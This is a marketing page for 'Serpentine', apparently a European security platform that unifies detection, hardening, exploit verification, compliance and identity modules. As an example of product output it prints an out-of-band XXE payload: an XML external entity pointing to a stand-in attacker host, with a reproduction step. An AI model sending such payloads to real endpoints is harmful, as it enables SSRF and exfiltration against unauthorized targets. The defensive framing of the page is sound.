The Unified European Security Platform
Your security stack is fragmented. Serpentine replaces it.
One platform unifying eight modules — detection, hardening, exploit verification, governance, investigation, identity oversight, data classification, and AI-security — on a single substrate, so every security signal shares one source of truth. Eight modules. Six intelligence layers. One substrate.
Sovereign EU infrastructure · No customer data used for training · SOC 2 Type II: In progress
8 modules · 6 intelligence layers · 9 OSINT sources · 35 compliance frameworks · 3,144 mapped obligations
Follow a Finding
One finding, eight modules, complete coverage
Watch how a single vulnerability flows through the entire platform — from detection to investigation to compliance evidence.
Active finding
Exposed admin endpoint
Administrative access exposed without authentication
NAPAD
Automated exploit confirmed unauthenticated access. Data exfiltration possible.
Output
PoC captured • Impact assessed
Substrate
Updates exploitability status
The Problem
Security stacks were not built to work together.
Most teams run separate systems for audit, testing, hardening, and compliance. Each system creates its own output. None of those outputs become a shared operating state.
Fragmented operating model
Result: manual correlation, delayed validation, duplicated work across 8 disciplines
The Shift
From fragmented tools to one unified platform.
Serpentine does not add another dashboard. It changes where security work lives: one substrate across findings, validation, remediation, identity, data, AI-risk, and evidence.
Current State: Fragmented Tools
- Detection: Vulnerability scanners
- Hardening: Configuration scripts
- Offense: Manual pentest
- Governance: Spreadsheets
- Investigation: SIEM queries
- Identity: IAM consoles
- Data: Data catalogs
- AI-Security: Manual review
With Serpentine: Unified System
- Detection: ODBRANA
- Hardening: POSTAVA
- Offense: NAPAD
- Governance: REGULATIVA
- Investigation: ISTRAGA
- Identity: NADZOR
- Data: PODATOCI
- AI-Security: PROTIVAI
Reality Check
Security posture is often wrong.
Most systems claim controls are in place. Serpentine shows where reality breaks them.
Most security platforms tell you what you've declared. Serpentine tells you what's actually true.
Declared control state
All production access requires MFA
Policy assertion dated Jan 2024
Observed enforcement state
2 production systems have no MFA enforcement evidence
Detected by Detection (ODBRANA) scan + Governance (REGULATIVA) mapping + Oversight (NADZOR) identity analysis
Why this matters: Breaks SOC 2 attestation · Invalidates ISO control A.5.15
Declared control state
All critical findings are resolved
Based on ticket status in ticketing system
Observed enforcement state
Exploitability was never validated
3 findings closed without Offense (NAPAD) validation
Why this matters: Creates unverified risk exposure · False closure masks active vulnerabilities
This is what Serpentine actually produces
XXE Injection — External Entity Processing
Content-Type: application/xml
<!DOCTYPE root [
<!ENTITY xxe SYSTEM
"http://oast.attacker.pro">
]>
...
DNS callback received from target infrastructure
CVSS 9.1 · CWE-611 · Evidence captured
Exploit Confirmed
Out-of-band DNS callback received
oast.attacker.pro → 203.0.113.42
Reproduction
Send XML payload to endpoint. Observe callback on controlled DNS server.
Proof
External entity resolution confirmed. SSRF to internal network possible.
Linked to finding ODB-2024-0847
Control Contradiction
Audit assertion invalidated. Control requires remediation evidence before re-attestation.
Adversarial Context
This XXE pattern matches campaign cluster NS-A7 TTPs (T1190 → T1059 → T1041). 12 documented exploitations in public threat research. Estimated attacker dwell time post-exploitation: 4-11 days.
Chained risk
If combined with weak egress filtering (detected on adjacent asset), enables out-of-band exfiltration of internal service map.
Recommended priority elevation: validate against authenticated paths within 72h.
Policy Applied
Configuration hardened. Drift monitoring enabled.
Identity Context
Identity risk elevates finding priority. Access review triggered.
Data Sensitivity
Data classification elevates breach scope. Notification timeline: 72h.
AI Risk Assessment
No AI-specific risks identified for this finding scope.
See what your system gets wrong
We'll show real contradictions in your environment.
Book a Demo
30-minute technical walkthrough · No slides, real system
The Architecture
Inside the substrate.
Serpentine does not move data between disconnected tools. It stores findings, validation, remediation, evidence, controls, assets, identity, classification, AI-incidents, and research in one operating state.
W: POSTAVA
R: All
W: ODBRANA
R: NAPAD, REGULATIVA
W: NAPAD
R: POSTAVA, REGULATIVA
W: POSTAVA
R: REGULATIVA
W: All
R: REGULATIVA
W: REGULATIVA
R: All
W: NADZOR
R: All
W: PODATOCI
R: ODBRANA, ISTRAGA
W: PROTIVAI
R: ISTRAGA, REGULATIVA
W: ISTRAGA
R: All
This is not a dashboard aggregating external data. This is one substrate where every action updates the same state.
The Platform
One substrate. Eight modules.
Detect · Enforce · Challenge · Govern · Investigate · Oversee · Classify · AI-Secure — all on a single data layer.
Detection
(ODBRANA)
Continuous detection across web apps, APIs, infrastructure, and cloud. Findings carry evidence chains and priority scores that update in real time.
Hardening
(POSTAVA)
Automated server hardening applied once and monitored for drift. Any config change is a substrate event every module sees immediately.
Offense
(NAPAD)
Controlled exploit verification that proves which vulnerabilities are practically exploitable — not just present on a CVSS score.
Investigation
(ISTRAGA)
LLM-guided investigations, adversary emulations, corpus-backed reasoning grounded in substrate data.
Governance
(REGULATIVA)
Continuous compliance across 35 frameworks and 3,144 obligations. Evidence packets generated automatically.
Oversight
(NADZOR)
Identity intelligence over Entra ID, Okta, and GitHub. Identity findings on the same risk register as vulnerabilities.
Classification
(PODATOCI)
Data asset catalogue with PII/PCI/PHI/secret classification and a top-N exposure ranking.
AI-Security
(PROTIVAI)
Protects AI/LLM workloads — prompt-injection detection, model-supply-chain checks, AI-incident response.
All modules read and write to the same substrate. Every finding, identity signal, data classification, and compliance obligation shares one source of truth.
The Mechanism
How Serpentine turns findings into evidence.
Normalize
Detection (ODBRANA)
Turns scanner output into structured findings.
Updates the same operating state
Validate
Offense (NAPAD)
Confirms whether the risk is exploitable.
Updates the same operating state
Remediate
Hardening (POSTAVA)
Creates or applies hardening policy.
Updates the same operating state
Prove
Governance (REGULATIVA)
Maps the outcome to controls and evidence.
Updates the same operating state
Reason
Investigation (ISTRAGA)
Synthesises across all steps. Validates attack paths, predicts emerging risk.
Reads from all
The value is not the steps.
The value is that every step updates one system. Oversight (NADZOR), Classification (PODATOCI), and AI-Security (PROTIVAI) write into the same substrate continuously — so every step reflects identity, data, and AI-risk context.
Use Cases
Built for the teams responsible for proving security.
CISO
- Risk visibility across all domains
- Board-ready security posture
- Audit-ready evidence on demand
MSSP / Security Firm
- Repeatable delivery model
- Client-ready reporting
- Multi-tenant workflows
Industries
Built for environments where evidence matters.
Trust
Trust, published.
Security platforms cannot ask for trust while hiding their own controls. SPNT publishes its security posture, subprocessors, responsible disclosure policy, and data handling documentation.
What Serpentine is not
Honest boundaries
Serpentine does not try to replace everything. These are the systems it complements.
Not an EDR
Serpentine does not deploy endpoint agents. Host-level process forensics, real-time syscall monitoring, and post-compromise endpoint hunting require a dedicated endpoint platform. Serpentine handles cloud, identity, and attack-surface coverage. The two are complementary.
Not a SIEM
Serpentine does not retain raw logs. The telemetry layer normalises cloud-audit and identity events into structured graph records — useful for correlation and reasoning, not for petabyte-scale search or custom rule authoring. Organisations needing full raw-log retention should run Serpentine alongside a dedicated SIEM.
Not a CSPM
A dedicated cloud-posture platform may have broader inventory coverage across dozens of cloud accounts. Serpentine prioritises depth over breadth: every finding it surfaces is graph-grounded, exploit-validated, and tied to a compliance obligation. For "which of these actually matters today?" rather than "how many misconfigs do we have?", Serpentine's model is the right one.
The Pilot
30 / 60 / 90 day framework
A structured pilot that proves value before commitment.
Day 30 — Coverage
- Detection module connected to production assets
- First OSINT enrichment loop running
- Initial finding register delivered
Day 60 — Validation
- Offensive validation on highest-priority findings
- Hardening policy generated for two control gaps
- First control-contradiction report delivered to your CISO
Day 90 — Evidence
- Compliance mapping complete for chosen framework (SOC 2 / ISO 27001 / NIS2 / DORA)
- First Investigation (ISTRAGA) consequence analysis published
- Pilot decision: continue, expand, or stop — your call
Pilot guarantee — if at day 90 the pilot has not produced audit-ready evidence on at least one framework, the pilot fee is refunded in full. Refund applies to the pilot engagement only; does not extend to subsequent commercial contracts.
This is not a demo environment. This is how your system will be evaluated.
One finding. Full lifecycle. Real validation.
See what your current stack misses.
Book a live walkthrough. We will show how one finding exposes gaps in validation, remediation, evidence, and adversarial context that most teams never see.